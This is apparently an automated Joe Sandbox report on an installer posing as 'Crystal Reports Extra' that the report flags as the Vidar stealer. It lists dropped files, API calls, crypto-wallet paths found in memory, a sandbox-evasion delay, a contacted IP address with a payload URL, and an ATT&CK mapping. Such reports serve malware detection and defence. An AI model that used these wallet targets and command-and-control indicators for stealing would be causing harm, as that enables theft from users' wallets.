        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\tsharkdecode.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libgpg-error6-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-Q7NRR.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libintl-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libnettle-4-6.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libffi-6.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Crystal Reports ExtraJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Crystal Reports Extra\Crystal Reports Extra.lnkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_005C90B4 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow,3_2_005C90B4
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_006A68B0 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow,3_2_006A68B0
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: 6_2_005C90B4 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow,6_2_005C90B4
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: 6_2_006A68B0 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow,6_2_006A68B0
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe TID: 5404Thread sleep time: -35000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-627NM.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\Microsoft.ReportViewer.ProcessingObjectModel.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\imageformats\qjpeg4.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\imageformats\qgif4.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-1UL10.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-KTI9L.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libogg-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-N95UU.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\FileHelpers.DLL (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\imageformats\is-GS64B.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-5P6B9.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-D30UI.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-L6ITB.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\is-D43R5.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-HRO44.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libtasn1-6.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\pthreadGC2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-FCT1V.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-TECE4.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\mingwm10.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-MMNOC.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-AFSCM.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-33ENG.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libmongoc-1.0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libgthread-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libbson-1.0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-B5IQO.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-5F8P5.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\imageformats\is-0V44S.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\LC.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-OSEV1.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-VO510.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\tsharkdecode.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libgmodule-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libgpg-error6-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libintl-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-Q7NRR.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libnettle-4-6.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libffi-6.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004AF91C GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,1_2_004AF91C
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_0040AEF4 FindFirstFileW,FindClose,1_2_0040AEF4
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,1_2_0040A928
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_0060C2B0 FindFirstFileW,GetLastError,3_2_0060C2B0
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_0040E6A0 FindFirstFileW,FindClose,3_2_0040E6A0
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,3_2_0040E0D4
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_006B8DE4 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,3_2_006B8DE4
        Source: C:\Users\user\Desktop\br4Cu3BycW.exe, Code function: 5_2_0040AEF4 FindFirstFileW,FindClose,5_2_0040AEF4
        Source: C:\Users\user\Desktop\br4Cu3BycW.exe, Code function: 5_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,5_2_0040A928
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp, Code function: 6_2_0060C2B0 FindFirstFileW,GetLastError,6_2_0060C2B0
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp, Code function: 6_2_0040E6A0 FindFirstFileW,FindClose,6_2_0040E6A0
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp, Code function: 6_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,6_2_0040E0D4
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp, Code function: 6_2_006B8DE4 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,6_2_006B8DE4
        Source: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe, Thread delayed: delay time: 35000
        Source: CrystalReports.exe, 00000007.00000002.562973809.00000000029C9000.00000004.00000001.sdmp, Binary or memory string: Hyper-V RAW
        Source: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe, Code function: 7_2_6E2BEB08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_6E2BEB08
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmp, Code function: 3_2_006A60E8 ShellExecuteExW,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,3_2_006A60E8
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmp, Process created: C:\Users\user\Desktop\br4Cu3BycW.exe 'C:\Users\user\Desktop\br4Cu3BycW.exe' /VERYSILENT
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp, Process created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe 'C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe'
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmp, Code function: 3_2_005C8B3C InitializeSecurityDescriptor,SetSecurityDescriptorDacl,3_2_005C8B3C
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmp, Code function: 3_2_005C7CE0 AllocateAndInitializeSid,GetVersion,GetModuleHandleW,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,3_2_005C7CE0
        Source: CrystalReports.exe, 00000007.00000002.562776703.0000000001260000.00000002.00020000.sdmp, Binary or memory string: Program Manager
        Source: CrystalReports.exe, 00000007.00000002.562776703.0000000001260000.00000002.00020000.sdmp, Binary or memory string: Shell_TrayWnd
        Source: CrystalReports.exe, 00000007.00000002.562776703.0000000001260000.00000002.00020000.sdmp, Binary or memory string: Progman
        Source: CrystalReports.exe, 00000007.00000002.562776703.0000000001260000.00000002.00020000.sdmp, Binary or memory string: Progmanlock
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp, Queries volume information: C:\ VolumeInformation
        Source: C:\Users\user\Desktop\br4Cu3BycW.exe, Code function: GetUserDefaultUILanguage,GetLocaleInfoW,1_2_0040B044
        Source: C:\Users\user\Desktop\br4Cu3BycW.exe, Code function: GetLocaleInfoW,1_2_0041E034
        Source: C:\Users\user\Desktop\br4Cu3BycW.exe, Code function: GetLocaleInfoW,1_2_0041E080
        Source: C:\Users\user\Desktop\br4Cu3BycW.exe, Code function: GetLocaleInfoW,1_2_004AF218
        Source: C:\Users\user\Desktop\br4Cu3BycW.exe, Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_0040A4CC
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmp, Code function: GetUserDefaultUILanguage,GetLocaleInfoW,3_2_0040E7F0
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmp, Code function: GetLocaleInfoW,3_2_006103F8
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmp, Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_0040DC78
        Source: C:\Users\user\Desktop\br4Cu3BycW.exe, Code function: GetUserDefaultUILanguage,GetLocaleInfoW,5_2_0040B044
        Source: C:\Users\user\Desktop\br4Cu3BycW.exe, Code function: GetLocaleInfoW,5_2_0041E034
        Source: C:\Users\user\Desktop\br4Cu3BycW.exe, Code function: GetLocaleInfoW,5_2_0041E080
        Source: C:\Users\user\Desktop\br4Cu3BycW.exe, Code function: GetLocaleInfoW,5_2_004AF218
        Source: C:\Users\user\Desktop\br4Cu3BycW.exe, Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_0040A4CC
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp, Code function: GetUserDefaultUILanguage,GetLocaleInfoW,6_2_0040E7F0
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp, Code function: GetLocaleInfoW,6_2_006103F8
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp, Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_0040DC78
        Source: C:\Users\user\Desktop\br4Cu3BycW.exe, Code function: 1_2_00405AE0 cpuid 1_2_00405AE0
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmp, Code function: 3_2_00625754 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeW,GetLastError,CreateFileW,SetNamedPipeHandleState,CreateProcessW,CloseHandle,CloseHandle,3_2_00625754
        Source: C:\Users\user\Desktop\br4Cu3BycW.exe, Code function: 1_2_0041C3D8 GetLocalTime,1_2_0041C3D8
        Source: C:\Users\user\Desktop\br4Cu3BycW.exe, Code function: 1_2_004B5114 GetModuleHandleW,GetVersion,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDEPPolicy,1_2_004B5114

        Stealing of Sensitive Information:

        Yara detected Vidar stealer
        Source: Yara match, File source: Process Memory Space: CrystalReports.exe PID: 6532, type: MEMORYSTR
        Found many strings related to Crypto-Wallets (likely being stolen)
        Source: CrystalReports.exe, 00000007.00000002.562871890.0000000002890000.00000004.00000001.sdmp, String found in binary or memory: \Electrum\wallets\
        Source: CrystalReports.exe, 00000007.00000002.562865621.000000000285C000.00000004.00000001.sdmp, String found in binary or memory: ElectronCash
        Source: CrystalReports.exe, 00000007.00000002.562871890.0000000002890000.00000004.00000001.sdmp, String found in binary or memory: \jaxx\Local Storage\
        Source: CrystalReports.exe, 00000007.00000002.562871890.0000000002890000.00000004.00000001.sdmp, String found in binary or memory: window-state.json
        Source: CrystalReports.exe, 00000007.00000002.562871890.0000000002890000.00000004.00000001.sdmp, String found in binary or memory: exodus.conf.json
        Source: CrystalReports.exe, 00000007.00000002.562865621.000000000285C000.00000004.00000001.sdmp, String found in binary or memory: \Exodus\
        Source: CrystalReports.exe, 00000007.00000002.562865621.000000000285C000.00000004.00000001.sdmp, String found in binary or memory: info.seco
        Source: CrystalReports.exe, 00000007.00000002.562865621.000000000285C000.00000004.00000001.sdmp, String found in binary or memory: passphrase.json
        Source: CrystalReports.exe, 00000007.00000002.562865621.000000000285C000.00000004.00000001.sdmp, String found in binary or memory: default_wallet
        Source: CrystalReports.exe, 00000007.00000002.562871890.0000000002890000.00000004.00000001.sdmp, String found in binary or memory: file__0.localstorage
        Source: CrystalReports.exe, 00000007.00000002.562865621.000000000285C000.00000004.00000001.sdmp, String found in binary or memory: \MultiDoge\
        Source: CrystalReports.exe, 00000007.00000002.562871890.0000000002890000.00000004.00000001.sdmp, String found in binary or memory: \Exodus\exodus.wallet\
        Source: CrystalReports.exe, 00000007.00000002.562865621.000000000285C000.00000004.00000001.sdmp, String found in binary or memory: seed.seco
        Source: CrystalReports.exe, 00000007.00000002.562871890.0000000002890000.00000004.00000001.sdmp, String found in binary or memory: \Electrum-LTC\wallets\
        Source: Yara match, File source: 00000007.00000002.562826054.0000000002670000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: Process Memory Space: CrystalReports.exe PID: 6532, type: MEMORYSTR

        Remote Access Functionality:

        Yara detected Vidar stealer
        Source: Yara match, File source: Process Memory Space: CrystalReports.exe PID: 6532, type: MEMORYSTR

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Command and Scripting Interpreter 2 | Registry Run Keys / Startup Folder 1 | Exploitation for Privilege Escalation 1 | Masquerading 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
        Default Accounts | Scheduled Task/Job | DLL Side-Loading 1 | Access Token Manipulation 1 | Virtualization/Sandbox Evasion 11 | LSASS Memory | Security Software Discovery 11 | Remote Desktop Protocol | Data from Local System 1 | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Logon Script (Windows) | Process Injection 13 | Access Token Manipulation 1 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder 1 | Process Injection 13 | NTDS | Virtualization/Sandbox Evasion 11 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | DLL Side-Loading 1 | Deobfuscate/Decode Files or Information 1 | LSA Secrets | Application Window Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 2 | Cached Domain Credentials | System Owner/User Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 1 | DCSync | File and Directory Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Timestomp 1 | Proc Filesystem | System Information Discovery 35 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
        Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | DLL Side-Loading 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

        Behavior Graph

        Behavior Graph ID: 492023, Sample: br4Cu3BycW.exe, Startdate: 28/09/2021, Architecture: WINDOWS, Score: 76

        Signatures: Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; Yara detected Vidar stealer; 3 other signatures

        Process chain:
        • br4Cu3BycW.exe started; dropped C:\Users\user\AppData\...\br4Cu3BycW.tmp, PE32
        • br4Cu3BycW.tmp started; dropped C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+
        • br4Cu3BycW.exe started; dropped C:\Users\user\AppData\...\br4Cu3BycW.tmp, PE32
        • br4Cu3BycW.tmp started; dropped C:\Users\user\AppData\...\is-7MTO8.tmp, PE32; C:\Users\user\...\CrystalReports.exe (copy), PE32; C:\Users\user\...\tsharkdecode.dll (copy), PE32+; 38 other files (none is malicious)
        • CrystalReports.exe started; DNS/IP: 147.135.170.166, 80, OVHFR, France

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label
        br4Cu3BycW.exe | 6% | Virustotal |
        br4Cu3BycW.exe | 29% | ReversingLabs | Win32.Trojan.Sabsik

        Dropped Files

        Source | Detection | Scanner | Label
        C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-7MTO8.tmp | 100% | Joe Sandbox ML |
        C:\Users\user\AppData\Local\Temp\is-627NM.tmp\_isetup\_setup64.tmp | 0% | Metadefender |
        C:\Users\user\AppData\Local\Temp\is-627NM.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Temp\is-D30UI.tmp\_isetup\_setup64.tmp | 0% | Metadefender |
        C:\Users\user\AppData\Local\Temp\is-D30UI.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs |
        C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe (copy) | 11% | ReversingLabs | Win32.Trojan.Sabsik
        C:\Users\user\AppData\Roaming\Crystal Reports Extra\FileHelpers.DLL (copy) | 0% | Metadefender |
        C:\Users\user\AppData\Roaming\Crystal Reports Extra\FileHelpers.DLL (copy) | 2% | ReversingLabs |
        C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\LC.dll (copy) | 0% | Metadefender |
        C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\LC.dll (copy) | 0% | ReversingLabs |
        C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\is-D43R5.tmp | 0% | Metadefender |
        C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\is-D43R5.tmp | 0% | ReversingLabs |
        C:\Users\user\AppData\Roaming\Crystal Reports Extra\Microsoft.ReportViewer.ProcessingObjectModel.dll (copy) | 0% | Metadefender |
        C:\Users\user\AppData\Roaming\Crystal Reports Extra\Microsoft.ReportViewer.ProcessingObjectModel.dll (copy) | 0% | ReversingLabs |

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        Source | Detection | Scanner | Label
        http://www.elecard.com | 1% | Virustotal |
        http://www.elecard.com | 0% | Avira URL Cloud | safe
        http://www.filehelpers.com0 | 0% | Avira URL Cloud | safe
        http://www.filehelpers.comg | 0% | Avira URL Cloud | safe
        http://147.135.170.166/ | 0% | Avira URL Cloud | safe
        http://147.135.170.166/public/sqlite3.dll | 0% | Avira URL Cloud | safe
        http://www.tux4kids.com. | 0% | Avira URL Cloud | safe
        http://www.filehelpers.com | 0% | Avira URL Cloud | safe
        http://bura-bura.com/blog/archives/2005/08/02/how-to-compile-an-application-for-102-or-103-using-xco | 0% | Avira URL Cloud | safe
        http://translationproject.org/extra/matrix.html | 0% | Avira URL Cloud | safe
        http://translationproject.org/ | 0% | Avira URL Cloud | safe
        https://www.remobjects.com/ps | 0% | URL Reputation | safe
        http://www.galuzzi.it. | 0% | Avira URL Cloud | safe
        https://www.innosetup.com/ | 0% | URL Reputation | safe
        http://tux4kids.net/~jdandr2) | 0% | Avira URL Cloud | safe
        http://www.filehelpers.com4 | 0% | Avira URL Cloud | safe

        Domains and IPs

        Contacted Domains

        No contacted domains info

        URLs from Memory and Binaries


                                                          Contacted IPs


                                                          Public

                                                          IP | Domain | Country | ASN | ASN Name | Malicious
                                                          147.135.170.166 | unknown | France | 16276 | OVHFR | false

                                                          General Information

                                                          Joe Sandbox Version:33.0.0 White Diamond
                                                          Analysis ID:492023
